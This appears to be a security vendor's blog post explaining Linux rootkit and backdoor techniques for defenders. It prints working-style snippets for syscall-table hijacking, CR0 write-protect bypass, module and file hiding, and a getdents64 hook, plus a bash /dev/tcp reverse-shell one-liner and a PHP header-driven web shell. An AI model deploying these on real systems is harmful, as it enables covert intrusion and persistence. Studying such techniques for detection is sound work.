Linux Backdoors




Introduction

When it comes to rootkits and other backdoors, everything is on the table. Is there a vulnerability in a system binary that can be exploited to gain root access? There's a rootkit1 for that. You allow kernel modules? A plethora of nefarious goodies can become part of your system! Your new chip is made in a third-party factory? You get the idea.

In this post, we will focus on software backdoors commonly seen in Linux environments, outline some representative examples, and discuss common techniques backdoor authors use to hide their malicious payloads.

What’s a backdoor?

Most things that are, or can be made, persistent in a system are candidates for rootkits and backdoors; options are limited only by the imagination and ingenuity of attackers. What's worse, even in cases where no privilege escalation to root is involved (which would enable a full rootkit), backdoors are at least as privileged as the respective service, component, or user, which, most likely, is enough to cause you trouble.

Once a backdoor has been installed, you can only hope someone notices, and given the multitude of means for attackers to get a foothold on your system (from build scripts and userspace applications to long-running utilities), it is hard to know where to look, or what to look for. After all, it only takes one malicious actor with the capability to install some malicious payload in some part of your system ;).  If such a foothold is established, attackers can now exfiltrate information, alter the normal operation of the system, bring services down, or take other undesirable actions. 

Although not as hard to detect as hardware backdoors, software backdoors and rootkits are a severe threat, used for state and corporate spying, information exfiltration, botnet command and control, or as stepping stones for reconnaissance and exploitation of other devices on the network.

The first rootkits date back to the early 1990s. These instances of backdoors simply replaced or modified files on the victim's hard disk (e.g., replacing the UNIX login program with a malicious one). In the mid-90s, kernel rootkits appeared on Linux systems in the form of kernel modules, and, by the end of the decade, they existed for most UNIX-like operating systems, such as Solaris and FreeBSD, as well as for Windows.

As rootkits evolved, attackers started devising more elaborate ways to modify in-memory contents of the running kernel or applications, as well as infecting the BIOS or device firmware, or using virtualization technology and hardware features to their advantage. Today, rootkits and other backdoors come in many forms and shapes. In this post, we will attempt to outline some representative examples of different types of backdoors, and discuss common techniques deployed in each case.

Species’ Samples

Overall, backdoors can be split into four large groups, depending on whether they exploit hardware or software vulnerabilities and also depending on whether they operate in kernel space or user space. In this post, we will focus only on software backdoors, and present some representative techniques for kernel and userspace backdoors, respectively. The outline of the rest of the post is the following:

Software / Kernelspace

Rootkits Abusing Loadable Kernel Modules (LKM)

This is the oldest and by far the most popular category of kernel rootkits seen in the wild. The first rootkits (ab)using kernel modules were described by Solar Designer, halflife, plaguez, and others. The great benefit of LKM-based rootkits is that they are very powerful, allowing attackers to do (almost) anything in the system. Their biggest drawback is that they are neither backwards nor upwards compatible and are almost certain to break as kernel versions change. Moreover, bugs in the code are likely to have (very) noticeable side effects, even resulting in a system crash.

Usually a kernel rootkit’s primary goal is to maintain privileged access, which it can achieve through a number of means:

  • Altering system behavior (e.g., by hijacking system call tables or interrupt handlers)
  • Hiding itself
  • Hiding other files, directories and processes
  • Providing mechanisms for regaining privileges, which could be through:
    • Escalating privileges for given users or processes
    • Triggering keyloggers
    • Enabling remote connections

In the following section, we’ll examine some of the core techniques used by LKM-based rootkits.

Altering System Behavior

Hooking by Replacing System Calls

A rootkit can hook system calls by replacing pointers in the sys_call_table. However, to do so, it must first locate the system call table (from 2.6.x kernels and on, sys_call_table is not exported). There are various methods to achieve this, some of which are outlined below:

  • If kASLR is not enabled (which is rarely the case nowadays2), the address of the system call table can be read directly from /boot/System.map via: grep sys_call_table /boot/System.map-$(uname -r) | awk '{print $1}'
  • If CONFIG_KALLSYMS=y is set in the kernel config, it is trivial to fetch the address of the system call table by running addr = (void *)kallsyms_lookup_name("sys_call_table");
  • Depending on the kernel and architecture, the system call table can be fetched using the interrupt descriptor table and finding the system call interrupt gate. This technique was first proposed by sd & devik and is used by several rootkits. Let us examine how the suterusu rootkit uses this technique: 
    • For x86 the code is as follows:
1. unsigned char code[255];
2. asm("sidt %0":"=m" (idtr));
3. memcpy(&idt, (void *)(idtr.base + 8 * 0x80), sizeof(idt));
4. sct_off = (idt.off2 << 16) | idt.off1;
5. memcpy(code, (void *)sct_off, sizeof(code));
6. p = (char **)memmem(code, sizeof(code), "\xff\x14\x85", 3);
7. if (p) { return *(unsigned long **)((char *)p + 3); }

The instruction at line 2 asks the processor for the interrupt descriptor table, while the instruction at line 3 copies out the interrupt descriptor of int 0x80. Line 4 computes the address of the int 0x80 entry point. The only thing left is to locate the call *sys_call_table(,%eax,4) instruction near the beginning of that entry point: line 6 searches for the opcode bytes "\xff\x14\x85", which correspond to the pattern call <x>(,%eax,4), and line 7 returns the desired address.

  • For x86_64 and ARM, similar tricks are performed. For example, on x86_64 the technique uses rdmsrl(MSR_LSTAR, <offset>); instead of asm("sidt %0":"=m" (idtr)); to fetch the system call entry point before searching for the appropriate call instruction (this is not as trivial on kernels configured with retpoline protection for Spectre/Meltdown); a minimal sketch of this variant appears after this list.
  • Older rootkits found the system call table by abusing the fact that sys_call_table always resided between the end of the kernel's code section (init_mm.end_code) and the end of its data section (init_mm.end_data). Since sys_close was exported by the kernel and the system calls were ordered by their numbers, the table could be located by scanning that range for an address whose __NR_close entry pointed to sys_close.
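
As a concrete illustration of the x86_64 variant, the following kernel-module fragment is a minimal sketch modeled on the suterusu approach described above. The function name is ours, the opcode bytes and scan length are illustrative, and, as noted, the pattern will not be found on retpoline-protected kernels.

#include <linux/kernel.h>
#include <asm/msr.h>

static unsigned long **find_sct_x86_64(void)
{
    unsigned long entry;
    unsigned char *code;
    int i;

    /* MSR_LSTAR holds the address of the 64-bit syscall entry stub */
    rdmsrl(MSR_LSTAR, entry);
    code = (unsigned char *)entry;

    for (i = 0; i < 512; i++) {
        /* ff 14 c5 <imm32>: call *sys_call_table(,%rax,8) on pre-retpoline kernels */
        if (code[i] == 0xff && code[i + 1] == 0x14 && code[i + 2] == 0xc5)
            /* the 32-bit displacement is sign-extended into a kernel address */
            return (unsigned long **)(0xffffffff00000000UL |
                                      *(unsigned int *)(code + i + 3));
    }
    return NULL;
}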

From the above, it is clear that determining the system call table address is not particularly hard given an LKM. Once the system call table address is found, one can replace system calls to their liking. Depending on how far the attacker is willing to go, one can overwrite the original address of a certain system call with one of their own, or, to be more subtle, overwrite code in the system call itself to point to their code.

This is not trivial in all cases (depending on kernel version and config), especially since recent kernels map text pages read-only, and since SMP requires the changes to be synchronized across all cores. Thus, although implementations are very much architecture-specific, taking Intel x86 architectures as an example, the gist of the technique used by most rootkits is the following:

First, if the page for the system call table is read-only it has to be marked as RW:

unsigned int level;
pte_t *pte = lookup_address((unsigned long)sys_call_table, &level);
if (!(pte->pte & _PAGE_RW))
	pte->pte |= _PAGE_RW;

Subsequently, the control bit within CR0 that write-protects memory also needs to be flipped:

unsigned long __cr0;
// per CPU code - make it preemption safe 
preempt_disable(); 
// read cr0 and flip the bit
__cr0 = read_cr0() & (~X86_CR0_WP);
// write back the new write-permission enabled bit
write_cr0(__cr0);
// replace the system call table entry
sys_call_table[__NR_syscall_of_choice] = (void *)&syscall_hook;
// replace the cr0 bit
__cr0 = read_cr0() | X86_CR0_WP;
write_cr0(__cr0);
// all done here
preempt_enable();

A modification like the above can be detected by comparing the addresses in the system call table against a copy made at a time the system was considered uninfected. If attackers employ more sophisticated rewriting techniques, detection must step up and become more sophisticated itself.
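
A minimal sketch of such a check follows, assuming sct points at the table located with one of the lookups above and that the snapshot is taken while the system is still trusted; the function names are ours.

#include <linux/kernel.h>
#include <asm/unistd.h>

static unsigned long clean_copy[NR_syscalls];

static void snapshot_table(unsigned long **sct)
{
    int i;

    for (i = 0; i < NR_syscalls; i++)
        clean_copy[i] = (unsigned long)sct[i];
}

/* returns the index of the first redirected entry, or -1 if the table is clean */
static int table_tampered(unsigned long **sct)
{
    int i;

    for (i = 0; i < NR_syscalls; i++)
        if ((unsigned long)sct[i] != clean_copy[i])
            return i;
    return -1;
}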

In addition to replacing a system call, a kernel module can also register a new, previously non-existent system call. However, that is clearly less covert than the previous approach of leveraging existing system calls.

Hooking Using Kprobes

Kprobes are a fantastic tool for tracing things in the kernel, and for getting useful information about the execution. A user can set a kprobe on symbols, kernel addresses, functions, etc., and can get access to register and stack state. Essentially, if you register a kprobe, a custom piece of code executes in the probe handler context before execution resumes as usual. Kprobe handlers can execute before or after a function returns, and have access to different states. Clearly this is very powerful, as stated in the kprobe documentation:

“Since kprobes can probe into a running kernel code, it can change the register set, including instruction pointer. This operation requires maximum care, such as keeping the stack frame, recovering the execution path etc. Since it operates on a running kernel and needs deep knowledge of computer architecture and concurrent computing, you can easily shoot your foot.”

As expected, kprobes, as well as the now-deprecated jprobes (another type of tracing mechanism), have been used in rootkits to achieve stealthiness. For instance, by registering a kprobe handler on file-related syscalls, it's easy to implement file-hiding behavior as part of your rootkit; a minimal registration sketch follows.
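
To make the mechanics concrete, here is a minimal kprobe registration sketch as a standalone module. The probed symbol (do_sys_openat2) varies across kernel versions, and a real file-hiding rootkit would instead rewrite the results of getdents64; this only demonstrates how a pre-handler gets invoked with the register state.

#include <linux/module.h>
#include <linux/kprobes.h>

static int handler_pre(struct kprobe *p, struct pt_regs *regs)
{
    /* on x86_64, regs->si holds the second argument (the pathname pointer) */
    pr_info("openat entered, pathname pointer: %lx\n", regs->si);
    return 0;
}

static struct kprobe kp = {
    .symbol_name = "do_sys_openat2",   /* adjust to the running kernel */
    .pre_handler = handler_pre,
};

static int __init kprobe_hook_init(void)
{
    return register_kprobe(&kp);
}

static void __exit kprobe_hook_exit(void)
{
    unregister_kprobe(&kp);
}

module_init(kprobe_hook_init);
module_exit(kprobe_hook_exit);
MODULE_LICENSE("GPL");

Once loaded, the handler's output shows up in the kernel log every time a process opens a file.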

Module Hiding Techniques

There are a multitude of techniques which modules employ to hide themselves from the system, as well as to hide other malicious files, directories, or processes.

Hiding by (ab)using debug registers

A technique that has been actively used in the wild to hide rootkits is taking advantage of a debugging mechanism present in x86. A great overview of this technique is presented by halfdead. Debug registers allow users to set hardware breakpoints. As soon as the execution flow hits an address marked with a breakpoint, control is handed to the debug interrupt handler, which then calls the do_debug() function.

Consider a scenario where you set a breakpoint on the address of the system call table, and then hijack the debug interrupt handler (INT 1) to call your own method, or replace the do_debug method, thus leaving the Interrupt Descriptor Table (IDT) intact. This is very powerful and stealthy: system calls, for instance, can be controlled by an attacker, and, if done cleverly, this technique works without touching the system call table, the system call handler, or the INT 80 handler. Further, if someone tries to detect INT 1 handler modification or place their own handler there (like a debugger would), the attacker can set a secondary breakpoint to watch their own handler's address.

Hiding by list manipulation and call hooks

One common way to hide the module from listing /proc/modules and lsmod is by simply removing it from the kernel module list structure (which does not remove it from memory).

An example of such manipulation is listed in the following snippet, taken from this sample rootkit:

// entry before the module in the kernel modules list - store so that we can restore things later
mod_list = THIS_MODULE->list.prev;
// delete this module
list_del(&THIS_MODULE->list);
kfree(THIS_MODULE->sect_attrs);
THIS_MODULE->sect_attrs = NULL;
// hide from /sys/module
kobject_del(&THIS_MODULE->mkobj.kobj);
list_del(&THIS_MODULE->mkobj.kobj.entry);

Similar tricks are used to hide binaries from commands like ps or ls. For instance, if one hooks the getdents system call, the replacement can filter out directory entries that belong to malicious files or processes before they are returned to userspace, thereby hiding any malicious activity. One such example is presented in this rootkit; a simplified sketch of the idea follows.
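
A simplified sketch of a getdents64 hook is shown below, assuming the pt_regs-based syscall convention on x86_64 and that the original handler was saved as orig_getdents64 when the table entry was swapped; the MAGIC_PREFIX marker is hypothetical.

#include <linux/dirent.h>
#include <linux/linkage.h>
#include <linux/ptrace.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/uaccess.h>

#define MAGIC_PREFIX "evil_"   /* entries starting with this are hidden */

static asmlinkage long (*orig_getdents64)(const struct pt_regs *);

static asmlinkage long hooked_getdents64(const struct pt_regs *regs)
{
    struct linux_dirent64 __user *udir = (struct linux_dirent64 __user *)regs->si;
    struct linux_dirent64 *kbuf, *cur;
    long total, off = 0;

    total = orig_getdents64(regs);
    if (total <= 0)
        return total;

    kbuf = kzalloc(total, GFP_KERNEL);
    if (!kbuf)
        return total;
    if (copy_from_user(kbuf, udir, total))
        goto out;

    /* splice out every entry whose name carries the magic prefix */
    while (off < total) {
        cur = (struct linux_dirent64 *)((char *)kbuf + off);
        if (!strncmp(cur->d_name, MAGIC_PREFIX, strlen(MAGIC_PREFIX))) {
            total -= cur->d_reclen;
            memmove(cur, (char *)cur + cur->d_reclen, total - off);
            continue;
        }
        off += cur->d_reclen;
    }

    if (copy_to_user(udir, kbuf, total))
        total = -EFAULT;
out:
    kfree(kbuf);
    return total;
}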

Rootkits Directly Modifying Kernel Memory

Non-LKM kernel patching was first described by Silvio Cesare in his Runtime Kernel Patching paper, which (ab)uses the direct access to kernel memory that Linux exposes through the /dev/mem and /dev/kmem device files. Modern Linux distributions disable this access by default. However, if CONFIG_STRICT_DEVMEM or CONFIG_DEVKMEM is not properly set in your kernel config, the entirety of the LKM-based functionality can be achieved without LKMs if a user has root access (see, for instance, this Phrack article from 2001 on system call patching). We will not elaborate further on this category due to the overlap with the LKM techniques.

Rootkits Abusing eBPF

This is an interesting and less-explored category that builds on the same principles as the previous ones: if a malicious actor gets privileges on a modern, eBPF-enabled Linux system, they can use tracing capabilities to see everything within the system, as well as write to userspace memory. As a notable example of such a type of rootkit, glibcpwn injects shared libraries into systemd, using bcc-based eBPF kprobes. In particular, the rootkit’s functionality is summarized by the following points:

  • Hooking the timerfd_settime system call, which is called by systemd every minute
  • Computing an offset to the start of libc by tracking appropriate structs from the arguments passed
  • Returning the stack return address and the address of __libc_start_main to the userland tracer code, and starting a ROP chain

Similar to kernel modules that hide themselves, once an eBPF program is attached to a kprobe, it can prevent processes from interacting with the kernel, listing eBPF programs, or listing kernel modules. However, contrary to kernel modules, eBPF filters need to be tied to a running process to stay alive. That said, if that process is init, the rootkit can stay alive for as long as the system is running.
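
As a minimal illustration of the visibility primitive this class of rootkits builds on, the following bcc-style kprobe body (restricted C, attached by a userspace loader) simply records every process that enters the timerfd_settime path; glibcpwn goes much further, reading the tracee's state and rewriting user memory from a similar hook. The function name and attach point are illustrative.

#include <uapi/linux/ptrace.h>

int on_timerfd_settime(struct pt_regs *ctx)
{
    u64 pid_tgid = bpf_get_current_pid_tgid();

    /* with systemd as the periodic caller, this fires roughly every minute */
    bpf_trace_printk("timerfd_settime hit by pid %d\n", (u32)(pid_tgid >> 32));
    return 0;
}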

Software / Userspace

Contrary to kernel-level rootkits, userspace backdoors usually don't have absolute power, but they are easier to write and carry less risk: a mistake or a version incompatibility won't crash the operating system.

Rootkits Replacing Common Utilities

The oldest category of userspace rootkits consists of those that replace common utilities. Usually, a binary that runs with root privileges is replaced or modified on the running system. Such rootkits can easily be detected by file integrity checking tools and signature-based solutions. Popular tools to scan a system for infections of this sort are chkrootkit and Rootkit Hunter, which check for known signatures and modifications performed by rootkits. For instance, chkrootkit performs a series of tests on the local system for hidden files or modifications performed by its tracked list of rootkits, and lists open connections involving port numbers known to be used by malware.

Rootkits Abusing ELF Metadata

A thorough demonstration of a metadata-based backdoor is presented by Shapiro et al.: using Cobbler, the authors demonstrated that it is possible to compile arbitrary payloads into an ELF's executable metadata, which is then “executed” by the run-time loader (RTLD). To provide a PoC of a backdoor using this technique, they inject a metadata-based backdoor into the ping binary of Ubuntu's inetutils v1.8. Normally, ping runs setuid root and drops its root privileges early on, and it accepts an optional --type argument to customize the type of packets sent. If that argument is provided, ping tests it like so:

if (strcasecmp(arg, "echo") == 0) {...}

The rootkit overrides the call to setuid() with getuid() (so as not to produce noticeable side effects), and overrides the call to strcasecmp() with execl(). This results in ping not dropping privileges and treating the argument to --type as a path to an executable to be executed. If the flag is not passed, the binary performs its regular functionality.

The key parts behind this implementation are as follows:

  • The compiler building ping does not know where setuid() and strcasecmp() will live at runtime and thus creates entries in the executable's Global Offset Table (GOT) to be lazily filled by the dynamic linker. However, if an entry in the GOT is not empty, the address it holds is treated as the location of the respective function in memory.
  • The rootkit crafts metadata to look up the base address of libc, then calculates the offsets of getuid() and execl(), and finally patches the GOT of ping to point to them before the binary is executed. The important part here is that this can be achieved using merely nine relocation entries and one symbol entry, without making any changes to the executable segments of the binary.

Module Backdoors

When was the last time you checked the integrity of your Apache or PHP modules? Module-supporting software is a good target for backdoors, as they can go undetected by almost all antivirus or network-based IDS systems (since, if written properly, traffic generated by a backdoor on the web server looks like, well, web server traffic). Another appealing aspect of modules is that, in most cases, they are platform independent and can easily be ported to different OSes and versions (e.g., as is the case with PHP). In this section, we present three examples of backdoors using modules, one for PHP and two for the Apache server:

  • PHP-Backdoor registers a PHP extension that hooks operations like hash and sha1 and subsequently logs the inputs to these functions (which are primarily passwords). This is a toy-example, but it is indicative of how different points in the system can be compromised by attackers to exfiltrate information.
  • mod_authg is an Apache module that simply registers a hook handler that fetches contents through Apache's portable runtime, essentially allowing leakage of system info (a skeletal handler in this style is sketched after this list). For instance, once the module is loaded, one may invoke it by passing /authg?c=id to the target URL and get a reply like the following:
HTTP/1.1 200 OK
Date: Thu, 19 Feb 2015 16:33:30 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Length: 54
Connection: close
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
  • mod_rootme is an Apache backdoor that can spawn a root shell. If configured properly, Apache is not running as root, but the module enables root access by abusing a pre-fork hook while the Apache process still has root permissions.
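
To give a feel for how little code such a module needs, here is a skeletal Apache 2.4 handler hook in the spirit of mod_authg. The module name and the /authg trigger prefix are illustrative, and a real backdoor would execute r->args and stream the output back rather than a fixed string.

#include <string.h>
#include "httpd.h"
#include "http_config.h"
#include "http_protocol.h"

static int authg_handler(request_rec *r)
{
    if (strncmp(r->uri, "/authg", 6) != 0)
        return DECLINED;                /* not our trigger URL, let others handle it */

    ap_set_content_type(r, "text/html");
    ap_rputs("handler reached\n", r);   /* placeholder for command output */
    return OK;
}

static void authg_register_hooks(apr_pool_t *pool)
{
    ap_hook_handler(authg_handler, NULL, NULL, APR_HOOK_FIRST);
}

module AP_MODULE_DECLARE_DATA authg_module = {
    STANDARD20_MODULE_STUFF,
    NULL, NULL, NULL, NULL, NULL,
    authg_register_hooks
};

Loading it takes a single LoadModule line in the server configuration, which is exactly why configuration files are one of the first places to look.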

Although the above backdoors are stripped down relative to their full potential, they are indicative of the fact that there are many different points at which a system can be compromised. One may argue that such backdoors are often easily detectable through configuration files. However, attackers can deploy more advanced hiding techniques, such as embedding malicious payloads within existing modules or modifying the appropriate objects.

For instance, Bußmeyer et al. demonstrate how to attack class-one smart card reader implementations, using a Javascript-based rootkit PoC which works as follows: first they hook appropriate Javascript functions in Firefox’s js3250.dll, then modify the Javascript loaded on window.onload so that every page viewed in an SSL secure banking context includes malicious remote Javascript which performs manipulated transactions that are hidden from the user.

Runtime Backdoors

Instead of modifying a PHP or Nodejs module, why not use the execution environment to your benefit? Runtime backdoors reflect a technique which has been used in the wild when hosts or websites are malicious. For instance, in Rootkits for Javascript Environments, Adida et al. demonstrate how it is possible to alter the Javascript environment in a webpage to steal user passwords when login bookmarklets are involved. Bookmarklets (also known as favelets or Javascript bookmarks) allow users to click on an element in their bookmark bar, and run Javascript in the context of the current web page. 

The bookmarklet feature has been used by common password managers and ads to auto-complete user info in various website forms. However, bookmarklets know nothing about the web page until their code actually executes, and their execution is opportunistic. In the benign scenario, the bookmarklet interacts with the native Javascript environment directly (Figure 1 - left). However, given a malicious webpage, the bookmarklet can be manipulated by interacting with the attacker’s Javascript objects instead (Figure 1 - right).


Figure 1 [src]

This allows attackers, for instance, to steal user passwords by tricking the bookmarklet into using the password for a different page.

Script & Config Backdoors

Reverse shells and other types of backdoors can also be implemented as simple scripts running on the system. Several such examples exist in open-source repositories and forums, ranging from simple one-liners such as bash -i >& /dev/tcp/<ip>/<port> 0>&1 to full-fledged scripts or binaries. Likewise, a backdoor could be part of untrusted code running on the host. For instance, a PHP website with the following code present in its codebase is vulnerable to remote command execution, in which an HTTP request header can be used to send commands to the server:

<?php
   if (isset($_SERVER['HTTP_CMD'])) {
       echo "<pre>" . shell_exec($_SERVER['HTTP_CMD']) . "</pre>";
   }
?>

Similarly, one can spawn loggers of various sorts (e.g., nc -vlp 80, using netcat to log incoming traffic to port 80). Attackers may also achieve persistence by modifying appropriate configuration files or scheduled tasks, such as by updating .bashrc entries to invoke other binaries instead of system utilities, replacing common commands with aliases, or modifying cron jobs, which schedule user tasks on a periodic basis. For example, known malware has “disguised” shell scripts as PNG files and attempted to replace different users' cron schedules with contents from freshly downloaded files, which subsequently launch further payloads such as cryptocurrency miners.

The above examples are just samples of the different possibilities open to attackers, and similar patterns can be applied to all public-facing code: regardless of the programming language used, backdoors can be inserted at every point, from the code itself, to the compiler toolchain, to the continuous integration and shipping stages. As stated in the classic Turing Award lecture “Reflections on Trusting Trust”: “To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software.” (or for that matter, trust that you are in good hands for your runtime protection ;))

Ptrace and inotify Hooks

Being in userland doesn't mean that you can't be stealthy. Several backdoors use ptrace to attach to a process and change its arguments by setting a breakpoint on main(). Similarly, one can use ptrace on attach and clone calls, executing a malicious payload in a new thread inside a host binary. Such techniques, as well as the use of inotify handlers to place read watches on directories whose inspection would reveal the backdoor, are known to be popular in the wild.
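
A hypothetical userland sketch of the ptrace angle: attach to a victim PID and inspect its registers. An actual backdoor would continue with PTRACE_POKETEXT to plant a breakpoint (0xcc) at main() and rewrite the victim's arguments or inject code once it trips; here we only attach, look, and detach.

#include <stdio.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>

static int spy_on(pid_t pid)
{
    struct user_regs_struct regs;
    int status;

    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) < 0)
        return -1;
    waitpid(pid, &status, 0);                   /* wait for the victim to stop */
    ptrace(PTRACE_GETREGS, pid, NULL, &regs);   /* x86_64 register snapshot */
    printf("victim rip: %llx\n", (unsigned long long)regs.rip);
    ptrace(PTRACE_DETACH, pid, NULL, NULL);     /* resume the victim untouched */
    return 0;
}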

Inotify is a Linux mechanism for monitoring filesystem events. One can register filesystem change callbacks that trigger if certain directories or files are accessed. Once backdoors detect that someone is about to mess with their files, they can unlink them from their original location, wait for the file/directory traversal to end, then restore things as if nothing ever happened -- kind of like a magic trick.
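
A minimal sketch of that trick, with a made-up /tmp/.hidden path: watch the directory the backdoor lives in and react the moment someone opens or reads it. A real backdoor would unlink its files inside the loop and restore them once the traversal ends; here we only print a notice.

#include <stdio.h>
#include <unistd.h>
#include <sys/inotify.h>

int main(void)
{
    char buf[4096];
    int fd = inotify_init1(0);

    if (fd < 0 || inotify_add_watch(fd, "/tmp/.hidden", IN_OPEN | IN_ACCESS) < 0) {
        perror("inotify");
        return 1;
    }

    for (;;) {
        ssize_t len = read(fd, buf, sizeof(buf));   /* blocks until an event fires */
        if (len <= 0)
            break;
        /* someone is looking: unlink now, restore after the scan finishes */
        printf("watched directory touched\n");
    }
    return 0;
}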

Conclusion

In this post, we outlined common techniques used by attackers to gain persistence in an execution environment. Although several of these techniques can be thwarted by modern runtime checkers and malware analysis frameworks, a recurring theme emerges: functionality that involves state and dynamic loading or unloading of code can be used both for good and evil, and the pool for new attack vectors is endless. 

Thus, it is critical not only to analyze software for such vulnerabilities, but also to build robust dynamic detection and prevention frameworks that do not rely solely on known exploitation patterns, but can provide runtime assurances that user-defined security properties are not violated. Our goal at Capsule8 is to provide the protection and visibility needed to ensure Linux production systems aren't pwned, without slowing down performance or inadvertently creating new backdoor opportunities (we don't use a kernel module for, well, all the above reasons).

 

 

 

1 Originally, the term rootkit was coined to denote “a collection of tools that enabled administrator-level access to a computer or network” (think utilities like sed and ps). Today the term almost exclusively refers to malware. In this post, we use the term rootkit to denote any malicious program that achieves persistence, whether in kernel space or userspace.

2 You may check the settings on your system by examining the CONFIG_RANDOMIZE_BASE and CONFIG_RANDOMIZE_MEMORY options in your kernel config.